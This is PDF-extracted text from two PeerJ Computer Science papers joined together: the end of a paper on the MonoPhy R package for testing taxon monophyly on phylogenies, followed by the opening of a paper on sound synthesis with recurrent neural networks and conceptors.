(Paradis, Claude & Strimmer, 2004), phytools (Revell, 2012), phangorn (Schliep, 2011), RColorBrewer (Neuwirth, 2014) and taxize (Chamberlain & Szocs, 2013). A list of the currently implemented commands is given in Table 1. Note that in the code and this paper, we distinguish between tips, the organisms at the tip of the tree, and higher order taxa. Functions with ‘taxa’ only return information about higher order taxa, not tips. The main function—AssessMonophyly—evaluates the monophyly of each higher order taxon by identifying the most recent common ancestor (MRCA) of a collection of tips (e.g., all species in a genus), and then returning all descendants of this node. The taxon is monophyletic if the number of its members (tips) equals the number of Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 2/8 https://peerj.com http://www.R-project.org/ http://www.R-project.org/ http://dx.doi.org/10.7717/peerj-cs.56 Table 1 Functions of the package MonoPhy. Function name Description AssessMonophyly Runs the main analysis to assess monophyly of groups on a tree. GetAncNodes Returns MRCA nodes for taxa. GetIntruderTaxa Returns lists of taxa that cause monophyly issues for another taxon. GetIntruderTips Returns lists of tips that cause monophyly issues for a taxon. GetOutlierTaxa Returns lists of taxa that have monophyly issues due to outliers. GetOutlierTips Returns lists of tips that cause monophyly issues for their taxon by being outliers. GetResultMonophyly Returns an extended table of the results. GetSummaryMonophyly Returns a summary table of the results. PlotMonophyly Allows several visualizations of the result. descendants of its MRCA. If there are more descendants than taxon members, the function will identify and list the tips that do not belong to the focal taxon and we then call these tips ‘intruders.’ Accordingly, we will further refer to the taxa whose monophyly was disrupted by these ‘intruders’ as ‘intruded.’ Note that if two taxa are reciprocally disrupting each other’s monophyly, certain tips of intruded taxa will often be intruders themselves: if the phylogeny is ((A1, B1), (A2, B2)), where A and B are genera, it is not clear if the A tips are intruding in B or the B tips are intruding in A. Biologically, identifying a few intruders may suggest that the definition of a group should be expanded; observing some group members in very different parts of the tree than the rest of their taxon may instead suggest that these individuals were misidentified, that their placement is the result of contaminated sequences or due to horizontal gene transfer between members of two remote clades. Moreover, the approach as described above would suggest that the clades that are intruded by the outlier tips would in turn be intruders to the taxon the outliers belong to, which intuitively would not make sense. We thus implemented an option to specify a cutoff value, which defines the minimal proportion of tips among the descendants of a taxon’s MRCA that are labeled as being actual members of that taxon. If a given group falls below this value, the function will find the ‘core clade’ (a subclade for which the proportion matches or exceeds the cutoff value) by moving tipward, always following the descendant node with the greater number of tips in the focal taxon (absolute, relative if tied), and at each step evaluating the subtree rooted at that node to see if it exceeds the cutoff value. Once such a subtree is found, it is then called the ‘core clade’, and taxon members outside this clade are then called ‘outliers’. As there is no objective criterion to decide at what point individuals should be considered outliers, a reasonable cutoff value must be chosen by the user. If the tree’s tip labels are in the format ‘Genus_speciesepithet’, the genus names will be extracted and used as taxon assignments for the tips. If the tip labels are in another format, or other taxonomic levels should be tested, taxon names can be assigned to the tips using an input file. To avoid having to manually compose a taxonomy file for a taxon-rich phylogeny, MonoPhy can automatically download desired taxonomic levels from ITIS or NCBI using taxize (Chamberlain & Szocs, 2013). Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 3/8 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.56 Figure 1 Monophyly plot of the genera of Ericaceae. Close-up on subfamily Vaccinioideae only. Branches of the tree coloured according to monophyly status. We can see that Vaccinium has two outliers and that its intruders are Paphia, Dimorphanthera, Agapetes and Gaylussacia. All inference results are stored in a solution object, from which the other functions can extract information (e.g., summary tables, intruder and outlier lists) for one or more higher-level taxa of interest. PlotMonophyly reconstructs and plots the monophyly state of the tips using phytools (Revell, 2012). Apart from the basic monophyly plot (Fig. 1), branches can be coloured according to taxonomic groups or to highlight intruders and outliers. Monophyletic groups can be collapsed and plots can be saved directly to PDF to facilitate the visualization of large trees. It is important to remember that the results produced by the package are merely the product of the used phylogeny and the available taxonomic information. It thus only makes the mismatches between those accessible, but does not reveal any more than that. The decision of whether the result suggests problems in the phylogeny or the taxonomy, whether a tip should be considered a rogue taxon and be removed or whether gene tree-species tree conflicts should be investigated, is entirely up to the user’s judgment. MonoPhy is available through CRAN (https://cran.r-project.org/package=MonoPhy/) and is developed on GitHub (https://github.com/oschwery/MonoPhy). Intended extensions and fixes can be seen in the issues list of the package’s GitHub page. Among the planned extensions of the package are: multiple trees, displaying the result for specific subtrees, proposing monophyletic subgroups, enabling formal tests for monophyly (incorporating clade support) and providing increased plot customizability. EXAMPLES Our first example makes use of the example files contained in the package. They come from a phylogeny of the plant family Ericaceae (Schwery et al., 2015 pruned to 77 species; for Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 4/8 https://peerj.com https://cran.r-project.org/package=MonoPhy/ https://github.com/oschwery/MonoPhy http://dx.doi.org/10.7717/peerj-cs.56 original data, see Schwery et al., 2014) and two taxon files assigning tribes and subfamilies to the tips (in both files, errors have been introduced for demonstration purposes; see code and output for both examples in Supplemental Information 1). Running the main analysis command AssessMonophyly on genus level (i.e., tree only) and tribe level (i.e., tree plus taxonomy file) using standard settings took 0.045 and 0.093 s respectively on a MacBook Pro with 2.4 GHz Intel Core i5 and 8 GB Ram. We could now use the remaining commands to extract the information of interest from the saved output object (e.g., summary tables, lists of problem taxa, etc.). The basic monophyly plot for the genus level analysis is displayed for a subclade of the tree in Fig. 1 (the figure of the full tree is shown in Fig. S1). For the second example, we demonstrate the package’s performance on a tree of 31,749 species of Embriophyta (Zanne et al., 2014; data see Zanne et al., 2013), using an outlier- cutoff of 0.9 this time. Just checking monophyly for genera took 1.78 h, but revealed that 22% of genera on the tree are not monophyletic, while around half of all genera are only represented by one species each. Furthermore, we can see that the largest monophyletic genus is Iris (139 tips), that Justicia had the most intruders (13 tips) and that Acacia produced the most outliers (99 tips). Finally, with 2,337 other tips as descendants of their MRCA, the 3 species of Aldina are most spread throughout the tree. CITATION Researchers using MonoPhy in a published paper should cite this article and indicate the used version of the package. The citation information for the current package version can be obtained using citation(‘‘MonoPhy’’). ACKNOWLEDGEMENTS We want to thank the members of the O’Meara lab for helpful discussions, Frederik Matsen IV and two anonymous reviewers for well-considered criticism to improve the manuscript, Brian Looney and Sam Borstein for beta testing, and the members of the Tank lab, Arne Mooers, Karen Cranston, Bruce Cochrane and Daniel Gates for great ideas on increasing the usefulness of this package. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work has been supported via a GTA to OS by the University of Tennessee, Knoxville. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: University of Tennessee, Knoxville. Competing Interests The authors declare there are no competing interests. Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 5/8 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.56/supp-1 http://dx.doi.org/10.7717/peerj-cs.56/supp-2 http://dx.doi.org/10.7717/peerj-cs.56 Author Contributions • Orlando Schwery conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/analysis tools, and wrote the paper, prepared figures and tables, performed the computation work. • Brian C. O’Meara contributed materials/analysis tools, and wrote the paper. Data Availability The following information was supplied regarding data availability: CRAN: https://cran.r-project.org/package=MonoPhy/ GitHub: https://github.com/oschwery/MonoPhy. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.56#supplemental-information. REFERENCES Avise JC, Arnold J, Ball RM, Bermingham E, Lamb T, Neigel JE, Reeb CA, Saunders NC. 1987. Intraspecific phylogeography—the mitochondrial-DNA bridge between population-genetics and systematics. Annual Review of Ecology and Systematics 18:489–522 DOI 10.1146/annurev.es.18.110187.002421. Chamberlain SA, Szocs E. 2013. taxize: taxonomic search and retrieval in R. F1000Research 2:191–191 DOI 10.12688/f1000research.2-191.v1. Coddington JA. 1988. Cladistic tests of adaptational hypotheses. Cladistics 4:3–22 DOI 10.1111/j.1096-0031.1988.tb00465.x. Czelusniak J, Goodman M, Hewettemmett D, Weiss ML, Venta PJ, Tashian RE. 1982. Phylogenetic origins and adaptive evolution of avian and mammalian hemoglobin genes. Nature 298:297–300 DOI 10.1038/298297a0. Dalevi D, DeSantis TZ, Fredslund J, Andersen GL, Markowitz VM, Hugenholtz P. 2007. Automated group assignment in large phylogenetic trees using GRUNT: GRouping, ungrouping, naming tool. BMC Bioinformatics 8:402. Donoghue MJ. 1989. Phylogenies and the analysis of evolutionary sequences, with examples from seed plants. Evolution 43:1137–1156 DOI 10.2307/2409353. Felsenstein J. 1985. Confidence limits on phylogenies: an approach using the bootstrap. Evolution 39:783–791 DOI 10.2307/2408678. FitzJohn RG. 2012. Diversitree: comparative phylogenetic analyses of diversification in R. Methods in Ecology and Evolution 3:1084–1092 DOI 10.1111/j.2041-210X.2012.00234.x. Gilinsky NL, Good IJ. 1991. Probabilities of origination, persistence, and extinction of families of marine invertebrate life. Paleobiology 17:145–166. Hey J. 1992. Using phylogenetic trees to study speciation and extinction. Evolution 46:627–640 DOI 10.2307/2409633. Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 6/8 https://peerj.com https://cran.r-project.org/package=MonoPhy/ https://github.com/oschwery/MonoPhy http://dx.doi.org/10.7717/peerj-cs.56#supplemental-information http://dx.doi.org/10.7717/peerj-cs.56#supplemental-information http://dx.doi.org/10.1146/annurev.es.18.110187.002421 http://dx.doi.org/10.12688/f1000research.2-191.v1 http://dx.doi.org/10.1111/j.1096-0031.1988.tb00465.x http://dx.doi.org/10.1038/298297a0 http://dx.doi.org/10.2307/2409353 http://dx.doi.org/10.2307/2408678 http://dx.doi.org/10.1111/j.2041-210X.2012.00234.x http://dx.doi.org/10.2307/2409633 http://dx.doi.org/10.7717/peerj-cs.56 Larget B, Simon DL. 1999. Markov chain Monte Carlo algorithms for the Bayesian analysis of phylogenetic trees. Molecular Biology and Evolution 16:750–759 DOI 10.1093/oxfordjournals.molbev.a026160. Matsen F, Gallagher A. 2012. Reconciling taxonomy and phylogenetic inference: formalism and algorithms for describing discord and inferring taxonomic roots. Algorithms for Molecular Biology 7(1):8. McDonald D, Price MN, Goodrich J, Nawrocki EP, DeSantis TZ, Probst A, Andersen GL, Knight R, Hugenholtz P. 2012. An improved Greengenes taxonomy with explicit ranks for ecological and evolutionary analyses of bacteria and archaea. ISME Journal 6:610–618 DOI 10.1038/ismej.2011.139. Neuwirth E. 2014. RColorBrewer: colorbrewer palettes. R package version 1.1-2. ed. Paradis E, Claude J, Strimmer K. 2004. APE: analyses of phylogenetics and evolution in R language. Bioinformatics 20:289–290 DOI 10.1093/bioinformatics/btg412. R Development Core Team. 2014. R: a language and environment for statistical comput- ing. Vienna: R Foundation for Statistical Computing. Available at http://www.R- project.org/ . Rabosky DL. 2014. Automatic detection of key innovations, rate shifts, and diversity- dependence on phylogenetic trees. PLoS ONE 9:e89543 DOI 10.1371/journal.pone.0089543. Revell LJ. 2012. phytools: an R package for phylogenetic comparative biology (and other things). Methods in Ecology and Evolution 3:217–223 DOI 10.1111/j.2041-210X.2011.00169.x. Robinson DF. 1971. Comparison of labeled trees with valency three. Journal of Combina- torial Theory, Series B 11:105–119 DOI 10.1016/0095-8956(71)90020-7. Schliep KP. 2011. phangorn: phylogenetic analysis in R. Bioinformatics 27:592–593 DOI 10.1093/bioinformatics/btq706. Schwery O, Onstein RE, Bouchenak-Khelladi Y, Xing Y, Carter RJ, Linder HP. 2014. Data from: as old as the mountains: the radiations of the Ericaceae. Dryad Digital Repository DOI 10.5061/dryad.t3fg2. Schwery O, Onstein RE, Bouchenak-Khelladi Y, Xing Y, Carter RJ, Linder HP. 2015. As old as the mountains: the radiations of the Ericaceae. New Phytologist 207:355–367 DOI 10.1111/nph.13234. Shochat D, Dessauer HC. 1981. Comparative immunological study of albumins of anolis lizards of the Caribbean Islands. Comparative Biochemistry and Physiology a- Physiology 68:67–73 DOI 10.1016/0300-9629(81)90319-4. Sibley CG, Ahlquist JE. 1981. The phylogeny and relationships of the ratite birds as indicated by DNA-DNA hybridization. In: Evolution today. Proceedings of the second International Congress of Systematic and Evolutionary Biology, 301–335. Zanne AE, Tank DC, Cornwell WK, Eastman JM, Smith SA, FitzJohn RG, McGlinn DJ, O’Meara BC, Moles AT, Reich PB, Royer DL, Soltis DE, Stevens PF, Westoby M, Wright IJ, Aarssen L, Bertin RI, Calaminus A, Govaerts R, Hemmings F, Leishman MR, Oleksyn J, Soltis PS, Swenson NG, Warman L, Beaulieu JM. 2014. Three keys Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 7/8 https://peerj.com http://dx.doi.org/10.1093/oxfordjournals.molbev.a026160 http://dx.doi.org/10.1093/oxfordjournals.molbev.a026160 http://dx.doi.org/10.1038/ismej.2011.139 http://dx.doi.org/10.1093/bioinformatics/btg412 http://www.R-project.org/ http://www.R-project.org/ http://dx.doi.org/10.1371/journal.pone.0089543 http://dx.doi.org/10.1111/j.2041-210X.2011.00169.x http://dx.doi.org/10.1016/0095-8956(71)90020-7 http://dx.doi.org/10.1093/bioinformatics/btq706 http://dx.doi.org/10.1093/bioinformatics/btq706 http://dx.doi.org/10.5061/dryad.t3fg2 http://dx.doi.org/10.1111/nph.13234 http://dx.doi.org/10.1111/nph.13234 http://dx.doi.org/10.1016/0300-9629(81)90319-4 http://dx.doi.org/10.7717/peerj-cs.56 to the radiation of angiosperms into freezing environments. Nature 506:89–92 DOI 10.1038/nature12872. Zanne AE, Tank DC, Cornwell WK, Eastman JM, Smith SA, FitzJohn RG, McGlinn DJ, O’Meara BC, Moles AT, Reich PB, Royer DL, Soltis DE, Stevens PF, Westoby M, Wright IJ, Aarssen L, Bertin RI, Calaminus A, Govaerts R, Hemmings F, Leishman MR, Oleksyn J, Soltis PS, Swenson NG, Warman L, Beaulieu JM, Ordonez A. 2013. Data from: three keys to the radiation of angiosperms into freezing environments. Dryad Digital Repository DOI 10.5061/dryad.63q27.2. Schwery and O’Meara (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.56 8/8 https://peerj.com http://dx.doi.org/10.1038/nature12872 http://dx.doi.org/10.1038/nature12872 http://dx.doi.org/10.5061/dryad.63q27.2 http://dx.doi.org/10.7717/peerj-cs.56 work_kxfutgt6zfhobmwolnrtzr7dle ---- Submitted 14 November 2018 Accepted 13 June 2019 Published 8 July 2019 Corresponding author Chris Kiefer, c.kiefer@sussex.ac.uk Academic editor Dan Stowell Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.205 Copyright 2019 Kiefer Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Sample-level sound synthesis with recurrent neural networks and conceptors Chris Kiefer Experimental Music Technologies Lab, Department of Music, University of Sussex, Brighton, United Kingdom ABSTRACT Conceptors are a recent development in the field of reservoir computing; they can be used to influence the dynamics of recurrent neural networks (RNNs), enabling generation of arbitrary patterns based on training data. Conceptors allow interpolation and extrapolation between patterns, and also provide a system of boolean logic for combining patterns together. Generation and manipulation of arbitrary patterns using conceptors has significant potential as a sound synthesis method for applications in computer music but has yet to be explored. Conceptors are untested with the generation of multi-timbre audio patterns, and little testing has been done on scalability to longer patterns required for audio. A novel method of sound synthesis based on conceptors is introduced. Conceptular Synthesis is based on granular synthesis; sets of conceptors are trained to recall varying patterns from a single RNN, then a runtime mechanism switches between them, generating short patterns which are recombined into a longer sound. The quality of sound resynthesis using this technique is experimentally evaluated. Conceptor models are shown to resynthesise audio with a comparable quality to a close equivalent technique using echo state networks with stored patterns and output feedback. Conceptor models are also shown to excel in their malleability and potential for creative sound manipulation, in comparison to echo state network models which tend to fail when the same manipulations are applied. Examples are given demonstrating creative sonic possibilities, by exploiting conceptor pattern morphing, boolean conceptor logic and manipulation of RNN dynamics. Limitations of conceptor models are revealed with regards to reproduction quality, and pragmatic limitations are also shown, where rises in computation and memory requirements preclude the use of these models for training with longer sound samples. The techniques presented here represent an initial exploration of the sound synthesis potential of conceptors, demonstrating possible creative applications in sound design; future possibilities and research questions are outlined. Subjects Artificial Intelligence, Multimedia Keywords Sound synthesis, Machine learning, Reservoir computing, Conceptors, Dynamical systems, Echo state networks INTRODUCTION Machine Learning and Sound Synthesis Current intersections between sound synthesis and machine learning are evolving quickly. We have seen significant progress in symbolic note generation (e.g., RL Tuner How to cite this article Kiefer C. 2019. Sample-level sound synthesis with recurrent neural networks and conceptors. PeerJ Comput. Sci. 5:e205 http://doi.org/10.7717/peerj-cs.205 https://peerj.com mailto:c.kiefer@sussex.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.205 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.205 (Jaques et al., 2016), Flow Machines (Ghedini, Pachet & Roy, 2016)), parametric control of sound synthesis models (e.g Wekinator (Fiebrink, 2011), automatic VST programming (Yee-King, Fedden & d’Inverno, 2018)) and also with current state of the art raw audio generation techniques. These recent advances in raw audio synthesis principally use deep architectures, for example WaveNet (Oord et al., 2016), SampleRNN (Mehri et al., 2016), NSynth (Engel et al., 2017), GANSynth (Engel et al., 2019) and WaveGAN (Donahue, McAuley & Puckette, 2018), to generate low-level audio representations (sample or spectral level) without using a synthesis engine, working as self-contained models that merge sound generation and control into one. There is also significant interest from the computer music community in sound synthesis with dynamical and chaotic systems, with strong connections to RNN techniques being used in contemporary deep architectures. This goes back to the earlier work of composers such as Roland Kayn who composed with electronic cybernetic systems, and is reflected in more recent work from, for example, Sanfilippo & Valle (2013) on feedback systems, Ianigro & Bown (2018) on sound synthesis with continuous-time recurrent neural networks, Wyse (2018) on sound synthesis with RNNs and Mudd (2017) on nonlinear dynamical processes in musical tools. The work presented here draws on overlapping research in both machine learning and dynamical systems techniques, in the context of sound synthesis. Reservoir computing While many contemporary developments in machine learning and sound synthesis are based on deep neural network paradigms, pioneering work has also been taking place within the bio-inspired field of reservoir computing (RC) (Schrauwen, Verstraeten & Van Campenhout, 2007). Within the RC paradigm, computation is performed using a structure that groups an untrained reservoir with a fixed input layer and a trainable output layer. The reservoir is a complex dynamical system which is perturbed by input signals and transforms these signals into a high-dimensional state space, the current state being dependent on both the current input and on a fading history of previous inputs. The output layer performs a linear transformation of the current reservoir state, and can be trained using supervised methods. RC systems can learn nonlinear and temporal mappings between the input and output signals. A reservoir can be created using both physical systems (e.g bacteria (Jones et al., 2007), a bucket of water (Fernando & Sojakka, 2003) or optics (Duport et al., 2016)) and digital systems. The latter usually take the form of liquid-state machines (Maass, Natschläger & Markram, 2002) or echo state networks (ESNs) (Jaeger, 2010). Echo state networks ESNs have so far been the primary technique employed for sound and music applications within the RC field. An ESN (see Fig. 1) uses a randomly generated recurrent neural network (RNN) as a reservoir. This reservoir is connected to inputs and output via single layers of weights. The output layer weights can be trained using linear optimisation algorithms such as ridge regression (Lukoševičius, 2012, p. 10). ESNs are inherently suited to audio applications due to their temporal dynamics. Jaeger’s original work with ESNs included examples of models being trained to output Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 Figure 1 An example of an Echo State Network with ten sparsely connected nodes, single inputs and outputs, and fully connected input and output layers. Full-size DOI: 10.7717/peerjcs.205/fig-1 discrete-periodic sequences and learning to behave as sine wave oscillators (Jaeger, 2010). Subsequently, ESNs have been applied to a range of creative sound and music tasks. These include symbolic sound generation tasks such as melody generation (Jaeger & Eck, 2006) and generative human-feel drumming (Tidemann & Demiris, 2008); direct audio manipulation and synthesis applications bear examples of amplifier modelling, audio prediction and polyphonic transcription (Holzmann, 2009b; Holzmann, 2009a; Keuninckx, Danckaert & Van der Sande, 2017); they have also been used for modelling complex mappings in interactive music systems (Kiefer, 2014). Under the classical ESN approach, as applied to the task of sound synthesis, ESNs are trained as audio rate pattern generators. A limitation of the classical ESN approach is that it is challenging to learn multiple attractors, corresponding to the generation of multiple patterns on different timescales with a single reservoir, although Holzmann (2009a) offered a solution by decoupling the reservoir with IIR filter neurons. A recent development of the ESN paradigm comes in the form of conceptors, an addition to the basic architecture of ESNs that enables the behaviour of the reservoir to be manipulated. Conceptors Conceptors (Jaeger, 2014a), offer a highly flexible method for generating and manipulating multiple patterns within single reservoirs. Conceptors are a mechanism for performing a variety of neuro-computational functions, the ones most relevant to sound synthesis being incremental learning and generation of patterns, morphing and extrapolation of patterns, cued pattern recall, and the use of boolean logic to combine patterns (Jaeger, 2014a). They work by learning the subset of state space visited by an RNN when driven by a particular input. They can then be used to restrict the RNN to operate with this subspace, functioning like an attractor (Gast et al., 2017). The separation of an RNN’s state space in this manner allows multiple attractors to be learned using the same network, and for combinations of these subspaces to be used to manipulate the dynamics and output of the RNN. The potential for combination of conceptors is a very powerful feature of this technique, and Jaeger describes boolean logic rules for achieving this (Jaeger, 2014b p.50). Their strong potential for pattern generation, extrapolation and manipulation, and the combination of continuous and discrete-boolean methods of manipulation are compelling Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 3/24 https://peerj.com https://doi.org/10.7717/peerjcs.205/fig-1 http://dx.doi.org/10.7717/peerj-cs.205 reasons to believe they will have strong applications in the field of audio and creative sound production. Sound generation with conceptors has, however, yet to be explored. Jaeger’s original work focuses on generation of short patterns of 20 samples of less, where much longer patterns are required for sound generation. Questions are unanswered concerning whether conceptors will (a) effectively generate longer patterns needed to synthesise audio signals at reasonable sample rates, (b) allow generation and combination of patterns with varied timbres within a single model and (c) produce signals effectively when evaluated with perceptually realistic audio comparison measurements. This paper approaches these questions through the application of conceptor models to a standard sound synthesis technique. It evaluates the effectiveness of conceptors at resynthesising sampled sound, and demonstrates conceptor-based sound synthesis techniques within a granular synthesis paradigm. New sound synthesis methods A new method of conceptor-based sound synthesis is demonstrated, named conceptular synthesis. This is a synthesis method based on granular synthesis. Granular synthesis (Roads, 2004) is based on the sequencing, combination and manipulation of short (typically 20 ms–100 ms) windowed segments (grains) of sampled sound. It is a powerful technique for creating and coherently manipulating sound; applications include time and pitch independent stretching of pre-recorded audio. In conceptular synthesis, an RNN model is trained to generate grains, which are recalled by conceptors. The use of conceptor based RNN models allows flexible sound manipulation through creative combinations of conceptors to influence reservoir behaviour. This method is described below; to begin with, a mathematical description of the RNN and conceptor models is presented. BASIC MODELS This section summarises the fundamental methods used in the creation of the sound synthesis models described below. For a more detailed explanation of these methods, please refer to Jaeger’s extensive technical report on conceptors (Jaeger, 2014b). The notation used below will be used throughout the paper. Matrices are represented by capital letters, vectors by lower-case letters, and scalar variables are shown using the greek alphabet. x(n) denotes the state of vector x at timestep n.M ′ denotes the transposition of matrix M. The basic model is an RNN consisting of ψ nodes, updated according to Eqs. (1)–(3): z(n+1)=Wx(n)+W ina(n+1) (1) At discrete time step n, activation levels for each RNN node are stored in state vector x of size ψ. The nodes are sparsely connected such that each node is connected, on average, to 10 other nodes (as recommended in Lukoševičius (2012, section 3.2.2). Connection weight values are stored in weight matrix W (of size ψ x ψ). Unconnected nodes share a weight value of 0. An input signal vector a (size 1) is fully connected to the RNN nodes with the input weight matrix W in (size ψ x 1). W in is generated using linear random values between −γ input and γ input . Reservoir weight values are randomly chosen from a normal distribution, scaled according to the spectral radius γW (to limit the maximum Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 absolute eigenvalue), and then optimised during training. In Eq. (1), the activation levels for each node are stored in vector z; in Eq. (2) these activation values are passed through a nonlinearity, and smoothed using leaky integration. x(n+1)=(1−α)x(n)+αtanh(z(n+1)+b) (2) b is a vector of ψ biases, which are generated from a linear random distribution between −γbias and γbias. Scaling in the above cases refers to a tensor being multiplied element-wise by a scalar value, X =Xγ . The tanh smoothing function ensures that the reservoir states remain in the range −1 to 1, and introduces a nonlinearity into each node. α is a leaky integration coefficient (Lukoševičius, 2012, section 3.2.6). This adds a one-pole lowpass filter to each node; lowering α (between 0 and 1) will slow down reservoir dynamics. This parameter can be fine-tuned to align the temporal dynamics of the reservoir to those of the desired output. y(n+1)=W out x(n+1) (3) Output weights W out are a matrix of size 1 x ψ, whose values are optimised during training. The output vector y is a vector of size 1. A model is trained in two phases: (a) audio signals aj are stored (Jaeger, 2014a) in the reservoir, so that they can later be reproduced, (b) a conceptor is calculated for each audio signal. Following training, the model and conceptors are combined and manipulated to synthesise sound. Storing patterns in the RNN and calculating output weights In this phase of training, a set of randomly generated reservoir weights W∗ are adapted so that the model can reproduce an array of driving audio signals aj, resulting in a new set of weights W . The number of elements in aj is determined by the sample slicing process detailed below. W∗ is optimised such that (a) Wx(n)≈W∗x(n)+W ina(n), i.e., the reservoir can simulate the driving inputs in their absence, and (b) the magnitudes of weights W are minimised. The resulting weight matrix W is used in all further calculations. W in is no longer required after this step. Training starts with a washout phase of length λ where the reservoir dynamics are allowed to settle, reducing influence from any transients that might result from the initial randomised state and that may adversely affect training. The model is subsequently driven by an input for length φ. The size of φ is task dependent, but should by large enough to collect the reservoir states that are likely to occur when perturbed by the input sequence. φ is calculated as an integer multiple of the length of training signal aj. The training process works as follows: for each pattern aj, the reservoir with weights W∗ is driven from an initial randomised state for λ+φ steps using Eqs. (1) and (2), and the resultant reservoir states are collected. Beginning at timestep 0, the states x from timesteps λ−1...λ+φ−2 are stored in ψ x φ matrix, X̃ j; states x from timesteps λ...λ+φ−1 are stored in ψ x φ matrix, X j; states z from timesteps λ...λ+φ−1 are stored in ψ x φ matrix, M j. The remaining states from the washout phase are discarded. The driving signals aj from timesteps λ...λ+φ−1 are stored in 1 x φ matrices Pj. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 5/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 These collections are concatenated into matrices X̃ =[X̃1|X̃2|...X̃n], X =[X1|X2|...Xn], M =[M1|M2|...Mn] and P =[P1|P2|...Pn] W and W out can now be calculated using linear regression. The regression could be solved using a number of techniques; in this case, following Jaeger’s initial work on conceptors (Jaeger, 2014b), ridge regression is used: W =((X̃X̃ ′+ρW Iψxψ) −1X̃M ′)′ (4) W out =((XX ′+ρout Iψxψ) −1XP′)′ (5) In both of the above, I is an identity matrix and ρW and ρout are regularisation factors. Calculating conceptors Conceptors can take several forms, the form used in this study is the alloconceptor (Jaeger, 2017, p18), a matrix conceptor that is calculated after patterns are stored in the network, and inserted into the update loop of the network at runtime. To calculate a conceptor which will influence the RNN to reproduce audio signal aj, the reservoir state correlation matrix R is initially calculated: R= X j(X j)′ φ (6) The singular value decomposition (SVD) of R is found U jSj(U j)′=Rj (7) Sj is modified as follows, and used to calculate the conceptor Cj: Snew =Sj(Sj+β−2Iψxψ) −1 (8) Cj =U jSnew(U j)′ (9) β is the aperture of the conceptor (Jaeger, 2014b, p43). The aperture is a scaling factor for the amount of energy that is allowed to pass when the conceptor filters the reservoir state in Eq. (11). The optimal value for β can be found programatically (see below). The new conceptor can now be inserted to the runtime loop of the RNN, as follows: z(n+1)=Wx(n) (10) This is a modification of Eq. (1), with the audio signal input removed, as it is no longer needed. z(n+1) is then passed through the leaky integration filter from Eq. (2), and result is multiplied by the conceptor, as follows: x∗(n+1)=(1−α)x(n)+αtanh(z(n+1)+b) (11) x(n+1)=Cjx∗(n+1) (11) Following this step, Eq. (3) is used to calculate the output signal. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 An optimal value for β can be found by observing the attenuation aC,β, which is the level of reservoir signal energy suppressed by the conceptor when the network is updated using Eqs. (10) and (11) (Jaeger, 2014b, p47). Attenuation can be calculated as follows: aC,β = E[||z(n)−x(n)||2] E[||z(n)||2] (12) The optimal value for β corresponds to the minimum value of attenuation, calculated by collecting states from the model using conceptors calculated with varying values of β. The result of this training process is an RNN coupled with a set of conceptors; this model is referred to as a conceptor-controlled recurrent neural network (CCRNN). These basic methods are used in the experiments below, and expanded on with new techniques that allow training and exploitation of the models for sounds synthesis. METHOD AND MATERIALS This project asks how the pattern generation ability of CCRNNs can be applied to the field of sound synthesis. It aims to establish and evaluate the fundamental capabilities of CCRNNs to be trained to reproduce arbitrary audio signals, and to explore their creative affordances. The next section evaluates the potential of CCRRNs to resynthesise sampled sounds. The ability of trained models to resynthesise the training signal is used as a measure of basic success in sound synthesis. Resynthesis ability is the core indication of sound synthesis quality, although this evaluation only tells part of the story, as the techniques outlined in this project are intended for open-ended use in creative sound synthesis applications. To this end, the project maps out key methods for parameterising and manipulating CCRNN sound synthesis models to create new sonic variations of the original training material, establishing the technical strengths and limitations of CCRNN sound synthesis, and identify open questions for future research in this area. There is some discussion of processing time to indicate the scale of computation involved with these techniques. The conceptular synthesis experiment was run on a machine with 4.2 GHz i7 CPU and an NVidia GTX 1080 Ti GPU using TensorFlow. Python 3 source code in Jupyter notebooks for all experiments is provided at https://github.com/chriskiefer/conceptorSoundSynthesis. Source code for a working implementation of conceptular synthesis in the form of a drum synthesiser can be found at https://github.com/chriskiefer/conceptularBeatSynth. Error and similarity metrics The experiments in this project focus on the quality of audio signals resynthesised with trained models in comparison to the original training material. In wider literature in reservoir computing, Normalised Root-Mean-Square Error [30 p2] (NRMSE) is commonly used to measure similarity between signals. NRMSE does not reflect perceptual aspects of sound similarity; these are crucial to understanding the results therefore a different metric is required. Mel-Frequency Cepstral Coefficients (MFCCS) have been shown to be a robust measure of timbral similarity (Jensen et al., 2009), and a good model of perceptual timbre Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 7/24 https://peerj.com https://github.com/chriskiefer/conceptorSoundSynthesis https://github.com/chriskiefer/conceptularBeatSynth http://dx.doi.org/10.7717/peerj-cs.205 space (Pampalk, Dixon & Widmer, 2003). They are widely used for music information retrieval tasks (Hamel & Eck, 2010) across a variety of use cases (e.g., (Yee-King, Fedden & 